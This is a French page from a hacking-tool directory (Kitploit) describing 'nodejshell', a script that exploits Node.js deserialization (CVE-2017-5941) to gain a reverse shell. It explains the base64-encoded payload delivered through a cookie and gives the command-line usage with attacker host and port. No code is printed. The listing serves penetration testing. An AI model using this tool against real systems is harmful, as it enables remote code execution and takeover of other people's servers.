Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nodejshell — Exploit de reverseshell pour désérialisation en NodeJs (CVE-2017-5941) | Kitploit
Outils/GitHubGitHub/uartu0/nodejshell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleOutil d'Accès à Distance
GitHubuartu0/nodejshell

nodejshell

Exploit de reverseshell pour désérialisation en NodeJs (CVE-2017-5941)

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

NODEJSHELL - Exploit de reverse shell pour désérialisation en NodeJs (CVE-2017-5941)

L'exploit génère automatiquement le payload de reverse shell, encodé en décimal puis en base64. Ensuite, ce payload est envoyé via une requête http POST qui sérialise l'entrée de l'utilisateur et la stocke dans un cookie. On obtient alors le RCE en y accédant par une requête GET.

Mode d'emploi:

python3 nodejshell.py <lhost> <lport>

lhost: votre adresse IP locale lport: le port sur lequel vous voulez connecter votre reverse shell

Ensuite, il vous suffit de fournir quelques informations simples:

  • Nom du paramètre qui enverra le payload via le POST. (Uniquement nécessaire si le cookie n'est pas déjà défini).
  • Nom du cookie qui activera le payload via le GET.

Une fois cela fait, activez simplement votre listener préféré et attendez de recevoir la connexion.

alt text alt text

Télécharger l’outil